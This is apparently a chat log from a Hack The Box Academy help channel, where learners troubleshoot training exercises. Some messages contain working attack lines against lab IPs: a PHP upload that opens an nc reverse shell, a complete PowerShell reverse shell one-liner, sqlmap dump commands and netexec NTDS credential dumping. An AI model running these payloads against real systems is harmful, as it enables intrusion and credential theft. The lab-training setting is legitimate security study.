I'm sorry if it's the wrong forum, but I really need help and I'm not sure where to submit it:
HTB Academy recognizes my browser as having adblock, even if there is none installed (and I tried Chrome, Firefox and Edge).
Due to that, I can't contact support (even though until a few days ago everything was fine even with adblock).
Does anyone know how to fix it?
Probably you haven't fully deleted adblock.
There's an email: customerops@hackthebox.com
I've tried to log in from browsers which don't have adblock installed.
Did you have adblock as a browser extension or as an app?
For Chrome, yes. But it seems it somehow got picked up on the server, and it displays that there is adblock from every browser.
I have the same, Amit. My browser has no adblock and somehow it did get a notification about it this morning.
Maybe Chrome changed something on their end.
Try to contact them via email.
But it's not just Chrome. I think maybe this is from their side.
Up until a few days ago everything was fine even with adblock.
I sent an email. I hope it will work.
Morning guys, I am busy with the Skills Assessment of the Windows Fundamentals module. I am trying to create a shared folder by going to Advanced Sharing and changing the share name there; I also checked the "Share this folder" box and applied the changed settings, but the folder's name does not change automatically. What would be the reason for this?
Where would the "NTLM password hash" be here? htb-student:1002:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
I have submitted aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58, aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: and :aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: all says incorrect answer
This section needs to be revised, and on top of that it gives 0 cubes. It's just not good.
https://academy.hackthebox.com/module/113/section/2164
This module is awesome yes
I hope it'll get updated with esc12-15
yea it was fun learning
One of the best reads I ever had.
hope sooo
username:rid:lm:nt
Also curious about this
Your hint is right! VERIFIED SOLUTION: Start the answer with "sudo tcpdump"!
So that tiny bubble to open up support/AI questionnaire turned into a massive banner that follows the scroll for every page?
Might be off topic here, not sure where else to post this. Looking for an invoice for an annual subscription, HTB never emailed me anything and I need it to submit. Cannot seem to find anywhere in the Academy to download receipts / invoices from a billing page. Anyone have an answer for this one?
Why does sqlmap -u "http://94.237.50.65:33570/case8.php" --dump --batch --csrf-token="t0ken" --method "POST" --data id=1&t0ken=4hgWm3mI7IBSOKGsvg6tgE5nbuV0F9E4GLrlvQR9i4 work, while sqlmap -u "http://94.237.50.65:33570/case8.php" --data "id=*&t0ken=qqLdNv4CJE6A0R4jJZAI2wEv2rTV4VWJzEzJAxa0uwI" --dump --batch --csrf-token="t0ken" does not? A difference is in the quotes, and I use the fish terminal. Is it a different terminal behaviour?
Good afternoon! I need assistance gaining control of DC01 in the skills assessment of Documenting and Reporting. I have a few account passwords that can access the domain; however, I am unable to obtain the admin hash / cannot crack the NT hash when using hashcat. Any ideas?
It shouldn't make an impact, I am sure I tried it but if --data is defined, it is intelligent enough to make it POST.
Hey guys, I have a doubt. I want to develop a SaaS using the MERN stack, but it's hard to use ChatGPT for this; it won't stay on the same track. Is there any trick to developing bigger projects using ChatGPT?
You can have bigger context window when using API, perhaps route it between the files giving it an ability to request some. There is a service that builds the whole project using API, I don't remember the name. It wasn't working well with SvelteKit, but it should with less new frameworks.
I would not assume it's intelligent enough. It's the same command, so leaving --method out and not defining it as a POST request breaks it; also the token seems to differ.
You can DM what you know, have done, etc.
Are there any connection problems with the module labs for you guys?
Module: Attacking Common Services - Attacking SMB - "Login as the user 'jason' via SSH and find the flag.txt file". The password I have keeps creating an error of "bash: !@28Bszh" whenever I try to use a tool to get the final piece. I have his full password and it is correct, but I keep getting the error.
Try using single quotes while entering the password.
I tried that; it didn't work, but it's fine, I resolved it another way. I think I used -u instead of -U, and smbclient seemed to then work.
Yes, smbclient takes -U for credentials.
Has anyone done the "Getting Started - Public Exploits" module recently? I've been scratching my head about this. Currently using the online workstation; the question says that the web server may take a few minutes to load up. I did an nmap scan of the IP using -sC and -sV to get versions, managed to find the web server, went to do the exploit, but then for some reason the web server closed. Did another nmap scan and got rpcbind, did an exploit for that, and that completed. Did another nmap scan to see if I can find the web server; however, that has not seemed to work either. Wanted to find out if other people have had issues with this module.
Hello, I'm in Linux Fundamentals, System Information.
"Which kernel version is installed on the system? (Format: 1.22.3)" I put many answers, but the one I think is right is 6.5.0, and the system says incorrect.
"What is the name of the network interface whose MTU is set to 1500?" I've tried tun0 and ens3; neither is correct. After many different types of attempts, I am at a loss on both questions at this point.
Any hints or tips would be greatly appreciated.
It has been a while since I have done it, but I am pretty sure if you read through the content thoroughly the answers are in there.
It's one of the commands listed.
The answers aren't in the text; how to get them, sure, but I'm pulling my hair out lol.
uname -a
Linux htb-3jsa8lsrmy 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux
I think I'm looking at the kernel version. I'm fairly new to this, so not exactly sure, but the command seems to be uname -a (I've tried uname -v as well).
Look at the uname help page; you aren't far off.
You're on the right track. Where would you go if you wanted to find more information about a command in the terminal?
man uname?
Yes, or uname --help.
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -s
Linux
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -n
htb-3jsa8lsrmy
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -r
6.5.0-13parrot1-amd64
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19)
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -m
x86_64
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -p
unknown
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -i
unknown
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -o
GNU/Linux
I've tried 6.5.0 and 6.5.13, but it says they're both wrong.
Am I still missing something?
uname -a
└──╼ [★]$ uname -a
Linux htb-3jsa8lsrmy 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux
Did you SSH into the target?
I spun the machine up right inside the module.
I'm not SSHing from my own machine, if that's what you're asking.
6.5.0-13parrot1-amd64 - that's the Pwnbox.
Am I SSHing within the VM? Or am I doing it from the machine I am physically working on? I think that's where I am getting hung up.
SSH from the Pwnbox to the target IP that comes up under the questions section.
Creds are already given to you.
I'm not seeing the IP; I do see the credentials.
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
10.10.15.110?
SSH to IP ADDRESS with user "htb-student" and password .....
Look at the screenshot above that mczen shared.
This is my first time doing this on HTB, my apologies.
It's all good. Be sure to take and maintain notes.
OK, I see the IP in his screenshot; I'm searching to see if I missed that on my screen.
For future reference, I don't see an IP on my screen that I would SSH into. Any reason?
You have to start the target; you'll get an IP.
Oooooooo, I thought starting the target was the same as starting up the VM.
OK, I start the VM and use the VM to SSH into the target. Broken brain.
OK, I'm getting acclimated to the setup. Thank you all, so helpful. I appreciate you all just not giving the answers; I need to suffer through what I don't know. I know you can appreciate that.
If you haven't done the Intro to Academy module yet, it may help you. It's fairly short but shows you how to navigate around.
I did it, but it was a few days ago and I was just finishing the Google Cybersecurity cert; I've been taking in a lot of information.
All good now, thanks again!
Cool, nice one, congrats. Like someone said before, open up OneNote or any text editor you like and make notes for each topic/module. Helps out a lot.
I have Obsidian open and I'm noting away; appreciate the reminder for sure! I'm a terrible note taker, so I'm trying to take more than I think is necessary.
You can create a task with the -x flag and export its XML so you can use it as a template. Make sure <actions>, <triggers> and <settings> are formatted properly; each element must be present and well structured within the XML file, because Task Scheduler expects every tag in place.
In CME, modules generally handle XML generation automatically, with limited flexibility in directly modifying the template unless you customize the source code.
It leverages WMI to execute commands remotely, so it avoids Task Scheduler, which means no XML is involved in the process, because it is different from atexec, where CME creates tasks under the hood.
Do the modules sometimes feel like they're out of order?
I was doing an InfoSec intro module and got to a Wireshark decryption part, but the decryption part was needed to solve the solution, and the actual part of the module about decryption came after I finished the flags?
This isn't the first time either; there have been a few times where a new concept is introduced and then fully covered in the next part of the module.
Need a hint in the API Attacks skills assessment, guys.
I'm logged in as supplier and now I'm trying to read flag.txt.
I found an input to upload a CV, but it is possible to upload a file with the `.pdf` extension.
When I try to read ../../../flag.txt or something, I can't read it. Can you give me a hint?
Module: Attacking Common Services - Attacking SQL Databases. I am on Q1: "What is the password for the 'mssqlsvc' user?" I have used mssqlclient and tried sqsh, and I can get to the databases. I get that flagdb requires the credentials from Q1 to get the flag, but I cannot figure out where this is. Any nudges would be greatly appreciated.
Try one of the methods in the reading
You can DM me what you are trying to do.
I have tried them. I am in the DB; I just cannot find anywhere that would store creds. I googled and it said the master DB, but I couldn't see anything.
In the reading, is there not a mention of stealing hashes?
OK, thank you, I will have to keep digging.
Hi, I'm working on the Attacking Active Directory module, in the section "Privileged Access".
I'm trying to answer the end-of-section questions using BloodHound.
I have run the SharpHound collector on the target and managed to ingest the results into my BloodHound install locally.
Can someone tell me where I can find a good explanation for the module on dynamic port forwarding with SSH and SOCKS tunneling? It's extremely poorly written.
Been arguing with ChatGPT for 30 minutes to understand this.
You can DM, if you want.
I feel like I should see results for the Cypher queries given in the section,
however I don't...
I did manage to find the answer for the first question in the section using PowerView,
Thx bro, but I feel like I need some resource or something. The whole module is just a mess.
but I'd like to see it in BloodHound, and I'm not sure whether the queries are not yielding anything because I am doing something wrong or because the data collected from the domain by SharpHound doesn't contain any users with those rights/privs.
Still need help with the Open-Source Software section under Windows Evasion Techniques.
If anyone can give me a hand actually executing either the obfuscated exe or loading Invoke-Seatbelt in PowerShell, that would be great, as it doesn't work whenever I try.
Executing any .exe is against the group policy, and I always get an error running the ps1 script.
does sqplus comes pre installed in pwnbox? if not , can someone guide me how to install it? thanks.
sqlplus
ty
I'm on this module: https://academy.hackthebox.com/module/18/section/81
The first question is: "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
I ran code I thought would work but got nothing back. I then checked the walkthrough, pasted the code it suggested, and got nothing back. I reset the machine and tried again; still nothing. Thoughts?
Code I came up with: find / -type f -name "*.conf" -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null
AND
find / -type f -name "*.conf" -user root -size +25k -a -size -28k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null
Walkthrough code: find / -type f -name "*.conf" -size +25k -size -28k -newermt 2020-03-03 2>/dev/null
You can remove some of the flags, but also check whether matching on the file extension is working in your command.
Module: Attacking AD, Section: Privileged Access. Not sure this is working properly. I have run SharpHound and ingested the resulting BloodHound files into my local installation of BloodHound CE. Then ran the queries given in the section to find the user that has PSRemote rights. No results.
I then checked the walkthrough, which does exactly the same, same query; I copied and pasted, no results.
In fact, I feel like the BloodHound data I have ingested does not contain any users that have PSRemote to a computer in the domain... just from browsing the data.
I currently have a hash, but whenever I go to crack it, I either get a super basic password or I get an error. It is an NTLMv2 hash, correct? I used impacket-smbserver to do so.
Have you considered that the super basic password is correct?
You can DM if you want.
I did, but I put it in the answer and it wasn't right.
Windows Privilege Escalation - User Account Control
What is the point of UAC bypassing if I can just get the admin token anyway by running the process as admin?
It was a different simple password.
If you have admin privileges you can either use those for UAC, or most of the time you won't be prompted for them. Sometimes it's useful to bypass UAC even with admin if you don't have a GUI.
Is it only when I don't have a GUI that I would need the bypass?
TBH I don't feel that this UAC is useful anyway.
If you have admin on the machine, then yes, that would be the only use case.
If you have Administrator on a Windows machine, though, then you basically have it rooted.
@midnight galleon are you able to help me with this?
I mean when I am not admin but I have some rights.
Is the UAC bypass still useful?
UAC is used to elevate your access token, so you can elevate from medium to high integrity.
Sadly I haven't done this module properly; I need to restudy it haha.
Ah, no worries.
OK, so if for example I did a UAC bypass and my account is a standard user account, does that count as a priv esc?
Yes
The bypass will give me all the admin privs? Sounds not right.
Basically the way Windows determines who can do what is with access tokens that range from System down to Low. Standard users by default are set at medium and Administrators are set to high. UAC bypass lets you increase your integrity level on the machine from medium to high.
Anyone up for a DM regarding the hard lab for the Password Attacks module (https://academy.hackthebox.com/module/147/section/1356)? I want to make sure I'm not down some silly rabbit hole...
So if I have this high level, can I access resources that are protected beyond my permissions? Like go and dump the SAM DB or something.
You would be a standard user but can use a high integrity access token.
It depends on the setup of the computer/domain, but you can check the NTFS perms; most likely no (90% sure).
You would need System level, I believe.
Completed the section, thank you so much for making me look at the obvious. Sorry to pester you.
OK, I kinda got it, thanks.
No worries!
lol even the guys at Microsoft said it is useless
Yeah, there are way too many bypasses.
OK, to give a bit more info... I have cracked the BitLocker password, but I can't use it because I can't mount the virtual drive without admin rights... Turning every stone, I turned my attention to some visible network hosts, but after password spraying didn't work (and brute-forcing with the usual wasn't getting anywhere quickly), I'm getting the feeling that those hosts are not really part of the game... Do I just need to find myself a Windows host where I'm an admin, to open this drive?..
Hi. Does anyone here ever run into a problem where it seems there should be a port attached to the box's IP, but there isn't? I'm on module/23/section/254, Remote File Inclusion (RFI), and unlike all the other sections of the module, no port shows up and the machine IP doesn't resolve in the browser. I tried resetting it a few times. The machines are also non-responsive to pinging. Also, I can reach other modules' machines.
I imagine there's some temporary backend issue. Giving up for the day. I will try again tomorrow.
yeah, just needed to spin up another room... massive waste of time. Alright, onwards and upwards...
... tomorrow.
which stage were you up to?
not sure what you mean, but it was the last exercise of the module
So you were past the KeePass bit?
yes
OK, gotcha. Well, if you took notes and are going again tomorrow I can try to help. I've got my notes from it.
Sorry, I wasn't clear, I finished it. But actually I'd be happy to compare notes because I find it really strange that I had to do what I did.
Ohh, that's good then. Yeah, I'll be on tomorrow.
Cool, thanks.
Are you still working on this?
finished it, but still curious whether I did what I was supposed to do
Nevermind it looks like you're done
You can DM if you'd like.
thank you, I have
I don't recall saying anything about a VPN issue.
I keep losing connection to my lab
Were you able to get the hashes? I'm in the same module, and it's been a good while. How long did it take for you to get your hash?
Solution I found (unintended, I believe): as part of the AppLocker section of the module, you can run exes in C:\Windows\Tasks\, so just move the exe there. Would be useful to add to the question. Will add to the erratum.
Hey, I just got this to work. DM me when you want.
Can someone please help me on the last section (skills assessment) of the Attacking WPS module? The AP I'm attacking keeps getting me locked out, even when setting delays and time to wait when getting locked out. Can someone please help?
OK, I was SSHed into an IP from a previous page... living and learning lol
Guys, can someone help me here?
I'm working on the Linux Fundamentals module in the Find Files and Directories section. It's asking me this: "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
I'm using this command but it's not working: find / -type f -name "*.config" -newermt 2020-03-03 -size +25k -size -28k -exec ls -la {} \; 2>/dev/null
Do any of you guys have some idea of what I can do?
I am literally stuck on the same question and just realized the target IP is not the same as in the previous exercises. I just created the proper target and SSHed in. Check to see you haven't made that mistake.
I mean, I had a problem and had to relaunch the VM; could that be the problem?
What worked for you? Did you reset the target?
Yes, I clicked the target button to get the IP; I was still in a previous machine. I've been on HTB for two days now, so either new targets are the norm as you move through the modules, or I timed out and a new one was necessary; I don't know yet.
So everything I tried failed because I was simply in the wrong machine. Silver lining, I'm probably a little better at Linux now lol.
lol, I reset here, let's see if it works.
It will; literally everything I tried the first time worked this time.
I mean, I hope, for your sake.
Hello friends, has anyone else had trouble installing the ODAT tool in the Footprinting module? The script in the module doesn't work due to some conflicts with pip3 and having to install the libraries via a Python virtual environment. I've been wrestling with it for quite a while now. I've resigned myself to maybe having to build it from source according to the project's GitHub README. Just wondering if there's an easier way.
IT WORKED, I had a typo, typed config instead of conf, smh
Thx for your help bro @civic steeple
haha there you go
someone way more seasoned than me would've caught that, my apologies
Nah bro, that's fine, you helped me think, haha
I followed the install instructions provided and didn't have any issues
Thanks for the response! The instructions in the GitHub project or the HTB module?
HTB
Hm. Perhaps it's my distribution. I'll have to tinker with it a bit more. Thanks for responding~
I'm in SQLMap Essentials > Attack Tuning > What's the contents of table flag6? (Case #6)
The hint tells you what prefix to use -- ||i.e. '`)'.|| -- but how would I know that without the hint?
probably experience with SQL queries
I'm using a Kali VM. Sometimes when I use ffuf I get 1000 req/sec and other times I only get like 300 req/sec. Is there any way to speed this up without increasing threads? I'm trying to do the web fuzzing skills assessment but it's taking forever.
I see. I've noticed the speed is dependent on what domain is being used. Is there a chance this could be faster if I try this at a different time, or is this just how it's going to be?
I hear that, good luck.
I already solved it, thank you very much
solved or still open?
curl -k -X PUT -H "Host: 10.129.164.186" --basic -u fiona:987654321 --data-binary '<?php system("cmd.exe /C "echo open 10.10.14.34 4444 > C:\Windows\Temp\nc.txt && nc -nv 10.10.14.34 4444 -e cmd.exe""); ?>' --path-as-is https://10.129.164.186/../../../../../../xampp/htdocs/1af271ec0935f7ccbd31dc24666f7f33.php
My rev shell didn't work. This is the easy lab of Attacking Common Services.
I solved the lab with a normal web shell, but I want to know why this rev shell drops.
Hi guys I need help with a question on the password attack module
Attacking Active Directory & NTDS.dit
nvm I managed to solve it
(Not sure where it would be best to ask this; berate me if this is too off-topic, but) for those of you taking notes with Obsidian, do you use the git plugin? And why do that over just having your vault in a git repo that you "manage yourself"?
Hi guys, I need help with this question.
I created a list of usernames from the given names; however, how do we use these usernames in order to attack SMB?
Here is my command.
usernames2.txt is the list of usernames I created.
Wdym? You already figured it out.
Yeah, I did, thanks, but I'm having issues submitting the answer.
I did check this out.
It tells you the valid one, just paste it in.
You don't.
Ah OK, I tried pasting it in, it doesn't work.
Make sure it's without all the stuff that NetExec outputs and it's just username:password.
You found the password to another user.
I haven't done the module.
Read the question again.
Ah yes.
Thank you, but why did it stop at this user and not carry on finding out all of them?
NetExec by default stops after finding a valid user.
You can specify it to continue.
There's a flag to keep going. Alternatively, you can make a new user list to focus on the target user.
Ah OK, guess I should delete the other users in that case.
Could you tell me the flag please?
You need to get into the habit of finding it on your own.
netexec smb --help will tell you.
--continue-on-success
Sigh.
Thank you all.
I am doing AD Administration: Guided Lab Part I in Introduction to Active Directory module. Facing trouble connecting to RDP.
Am I doing something wrong or is it infrastructure issue?
Use remmina or another tool
show the command
netexec smb 10.129.202.85 -u username -p password --ntds
I've hidden the username and password from spoilers
Used Windows Remote Desktop Connection (black screen), shifted to WSL Kali xfreerdp (black screen), and rdesktop is at least showing a display.
Thanks remmina worked. Do you know what was the issue?
module name section name and question also helps
Black screen, just hit enter
Password attack module and here is the specific one in the module
Attacking Active Directory & NTDS.dit
Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)
I used the username list of Jennifer Stapleton to get her username and password
wait a minute
apparently ive already got it ๐ค
Hi. I need help to solve the following on Footprinting - DNS
Q4: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
So far I've done the following:
- Performed ||the subdomain bruteforcing as in the guide module||
- Performed ||the same thing, but with running through $subs.internal.inlanefreight.htb ...||
- Retried ||dig axfr on the subdomains that I've found from dig axfr internal.inlanefreight.htb ...||
None of them worked. Is there any guide that I might have missed? Thanks in advance!
I thought we needed the ntlm hash or something
nope, not working, would use remmina for now but this issue seems weird to me
You may need a bruteforcing tool
you mean this one? I've performed it, but I haven't found the FQDN whose IP ends with 203
You can use a subdomain in the query
Hi, i need help in a skill assessment, i am doing the shells and payloads real world situation and i have to connect via rdp to an internal network pc, but when i connect i get into a really old version of parrotos, for the scenario i have to visit a url but in the os there isn't a browser, what should i do?
i see. lemme try with any subdomains that I found from the previous guide. thanks for the hint
Edit: Finally got the value. Thanks!!
Type firefox in terminal
firefox google.com
ty guys
Or another question is "are there any indications that it's worth cranking sqlmap's --risk and --level to 11?" In other words, what do I look for that suggests a parameter is vulnerable if only we try harder vs a well-handled parameter?
I have the same problem, what's the solution for the syntax errors?
11 isn't a valid number
It does not. "Turn it up to 11" is from a mockumentary called Spinaltap. I don't recall the values, 3 and 5 I think.
The question isn't about the values, I'd like to know if there are indications that turning up --risk and --level are worth trying or if it's just a param that's handled appropriately.
I'm always getting a syntax error using this payload: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.90',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
what's wrong with it?
Got it, it works with a shell which I found on reverse shell generator
how did you solve it please
Should I be able to curl docker targets?
╰─$ curl -IL 94.237.59.180:45414
curl: (52) Empty reply from server
╭─l0dest4r@archlinux ~/Downloads
╰─$ curl -IL 94.237.59.180
curl: (52) Empty reply from server
It depends what's being hosted
I would expect that to work if it's a webservice
I'm not having much luck with the docker targets
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://94.237.59.180/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://94.237.59.180/: Get "http://94.237.59.180/": EOF
you're most likely forgetting the port
if it's an external IP, there will always be a port
can you access the link in your browser?
no
I can open it here - without vpn
Is this that vpn issue I was talking about yesterday again?
VPN is only needed for internal IPs
I am connected to HTB vpn but also my own tunnel
this is a public IP, no vpn is needed
Curl and gobuster work with my private VPN turned off
Need to get round to sending that support email 
PoC and Patching - Validation Logic Disparity.
Any hints? I know I need the email to end in a specific way but that's all
In Parameter Logic Bugs
I'm really liking the cheat sheets you guys put in the modules. I'm still taking notes but it's reducing my need to copy across a lot of commands.
Attacking Common Applications - Gitlab...has anyone found a wordlist to find the additional user for Gitlab? I have used just about every wordlist I can and none of them seem to answer the challenge
Am I just doing this wrong? I am user1 and the result of sudo -l is that I can run /bin/bash as user2 with no password, but all of these commands return "user2 is not in the sudoers file. This incident will be reported.":
- sudo -u user2 /bin/bash
- sudo -u user2 su -c 'cat /home/user2/flag.txt'
- sudo -u user2 python -c "with open('/home/user2/flag.txt') as f: print(f.read())"
- sudo -u user2 awk '{print}' /home/user2/flag.txt
- sudo -u user2 find /home/user2 -type f -name flag.txt -exec cat {} \;
@soft reef that is interesting I have been through most of them in SecList with no success. I went on to find the flag but all users I found did not answer the challenge.
Ok let me check, 1 sec.
I am running through RY currently but pretty much same result.
according to a write up sudo -u user2 /bin/bash should work
It's in one of the SecLists lists.
So when you ran sudo -l as user1, it said you can run /bin/bash as sudo?
I'm not sure how to give you a hint without giving you the answer, but here's the best I can do:
||Use your sudo rights to run bash||
Yeah, the first time I tried I just kept getting "user2 is not in the sudoers file", but then I disconnected, regenerated the box, ran sudo -u user2 /bin/bash and it worked.
Oh, so it worked for you. I think I had a similar issue when I did it, but I used another method to get past the issue. Can't remember though, it's been a long time.
Hi
I've been working on a pentesting exercise and recently managed to obtain a user's hash with GetUserSPNs.py and cracked it with john. After validating the credentials with GetADUsers.py against administrator.htb, I was able to confirm that the credentials for olivia and ethan are indeed correct.
Here's a summary of what I've done and the issue I'm facing:
Used GetUserSPNs.py to request a hash for the user olivia, cracked it, and verified it alongside ethan's credentials using GetADUsers.py -all.
WinRM access works perfectly with olivia, but I can't connect via WinRM with ethan's credentials, even though the credentials are confirmed to be correct.
When I log in as olivia via WinRM, I can see only three accounts on the machine: olivia, emily, and administrator. However, ethan's credentials should, in theory, allow me to connect.
My question is: Why might ethan's credentials fail with WinRM access even though they are valid, and what else can I try to troubleshoot this?
Additional Info:
OS: Target machine is Windows Server 2019.
WinRM is configured correctly since it works with olivia.
I've already attempted using different Impacket tools and CrackMapExec with ethan, but they don't return any unusual errors.
Any insights on why I might be facing this issue or suggestions on additional checks or configurations I could try would be greatly appreciated!
only users of the "remote management users" group are allowed to winrm into the machine. Ethan is not part of that group most likely
I am stuck in a loop trying to get the user's flag. My guess is the flag is in emily's account, which I have not been able to obtain the hash for. Any luck??
have you checked what ethan can do/ what groups he is part of?
Ok thanks I will keep cranking away on it. did you have to narrow the list or anything to get it? I have been stuck trying to clear that question for 3 days. I have been using the Python script and it usually times out but I get about 8 to 10 results; none of which have been successful.
Which list are you using?
He is just in the domain group membership, not much help there. Emily is in the "Remote Management Users" but I don't have the credentials to access the account
Not sure if this is the right place
Hello all,
I am currently working on the FTP footprinting and was able to get the flag.txt file, but when I try to get the first question "Which version of the FTP server is running on the target system? Submit the entire banner as the answer." I can't get the answer.
I have tried the nmap command nmap -sV --script=banner -p port <ipaddress>, nc -nv and even connecting to the FTP server, but every time I fill in the banner as an answer I get the response that the answer is wrong. Can someone tell me what I am doing wrong?
Ethan has special rights over another user, try to enumerate that. If you use Bloodhound you can also very quickly check that (if you don't know about bloodhound, its a great tool for AD escalation path visualisation, a bit annoying to set up at first but really great once you get it running)
So you've got the banner but can't submit it?
When I submit the banner I only get the response that the answer is wrong. I have re-read the whole page and tried everything I can think of.
Can you redact and give me the first and last character of your answer? That way I can confirm whether you have the correct banner.
I'm afraid that's incorrect. Unless they've changed the answer since I've done it.
Sure
hello
Can u help me with some hacking?
like what ?
mention the name and section of module
I am just askin can u help me hack a discord server
I can't send messages in general that's why i messaged here
Ok i will do it later so should i dm u server link?
no bro i cant hack a discord server
and its also against the rules
U gotta be kidding me
Hacking is also illegal
unless given permission
Who gives permission to hack
the company that will hire you
I know nothing about hacking
Hmm
and dont try to hack discord because you dont have permission from them
Yeah get it
good luck :)
I'm in the home stretch, but I'm stuck
I'm in Attacking Enterprise Networks - Post Exploitation.
Port 22 of 172.16.9.25 is closed, when it's supposed to be opened.
Those of you that finished this final module, can you guide me in the right direction?
172.16.9.25 pinged True in evil-WinRM, but it's closed when I run an nmap scan with proxychains.
Read the section to see it
I did. I made sure socks4 was 9050 before moving forward
i used ligolo for my pivot ¯\_(ツ)_/¯
I'm just trying to see why 172.16.8.25 pings true when I'm in evil-WinRM, but port 22 is closed when I nmap it.
Anyone that could give a hand on Common Session Variables (Account Takeover) on Abusing HTTP Misconfigurations ?
I have done the account takeover but the login2.php suddenly requires a mfa token of sorts. Anyone that has done this that could give a hand?
I have used the cirt, xato-dup, sap, mssql and rockyou
Need a nudge on this as well...
Nmap can be funky over proxy
Then you should have found it, its in there. So what users are you getting back?
Hi I am trying to indent these two lines in a python file in Vim(can't use nano in this module) but when I tab over with the tab key it doesn't work.
I've tried some of the online suggestions and they are also recommending that I use tab
In Getting Started Section > Knowledge Check, I obtained my initial foothold on the system, but I don't have access to any commands like: wget, sudo, apt, su, python, python3, etc. Pretty much everything except cat, cd, and ls. Even when looking at what is installed under /bin and all of the packages we are used to. But still am not able to use them when using absolute pathing. Am I missing something?
click A on your keyboard first
did you figure it out?
shift + A or just 'A'
a
Sent to you in a DM
How come there is little to no support on CWEE modules got damn
Hi guys
Could someone check if you can use credentials for ssh login from this page ( https://academy.hackthebox.com/module/176/section/1754 ) to login into machine spawned from next section ( https://academy.hackthebox.com/module/176/section/1778).
It says login pass are kali/kali - but no matter what I do I can't connect to spawned machine.
Just wanted to check if there is something wrong with the module before I contact customer support
Cheers
Maciek
Has anyone done Wi-Fi Penetration Testing Basics --> Aireplay-ng module?
The answer of the question: "Set the channel to 11 and test for packet injection using aireplay-ng. On how many APs does it perform packet injection? (Answer in digit format: e.g., 3)"
is not what I got in the output of the required commands.
Can anyone explain to me in private chat please? (I don't want to spoil any specifics here)
You can DM if you'd like.
Because there's not many people that have done them
Thank you!
@languid fjord
yes?
Can I dm
about?
something

Hey guys, not sure if this is the correct spot for module questions but I'll post anyway. Currently working on the Windows Attacks & Defense module for the SOC Analyst path, however I'm coming across a roadblock with the final question: Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonni user? Seems simple enough, right? RDP with the credentials I found with the SearchUserClearTextInformation script, unable to login, incorrect credentials as expected. However, in the Domain Controller I can only see events 4625 and 4776 that relate to my failed login, nothing in the hinted 4771 EventCode. I have been going back and forth, even attempting to authorize access via cmd. I have even managed audit settings in Group Policy Management, specifically enabling Kerberos Pre-Authentication Auditing (which surprisingly was not configured???), with still no change to Kerb pre-auth logs (4771). For some more context, I attempted to RDP via the VM cli, host Windows OS, through Windows RDP. I even checked pre-existing logs under 4771 with nothing relating to the bonni user, also cleared all logs and performed the entire process from scratch to make sure it wasn't getting lost in the muck. Any help would be most appreciated, I'd love to check off this section so I can receive my badge and move on to the next module
has anyone had this issue on pass the ticket from linux
root@linux01:/# smbclient //DC01/julio -k
gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER
ticket is likely not valid
you need to attempt the connection with the FQDN not the IP
I've tried both of julio's tickets, both say the same thing
try changing vpn regions and respawning targets; check ticket validity as well
hey guys I'm doing the AD enumeration, credential enumeration on Linux section, I'm trying to use the bloodhound GUI but I don't really understand what to do, can anyone help me?
On the Attacking Common Applications skills assessment, the only command I can get working is DIR. I am wondering how to get a shell back to my listener. I was thinking to use certutil and download nc.exe and do it that way, but I have tried and cannot get it to work
http://IP:8080/cgi/cmd.bat?& (Injecting here) the target machine is batch cmd
why do you need a shell?
:)
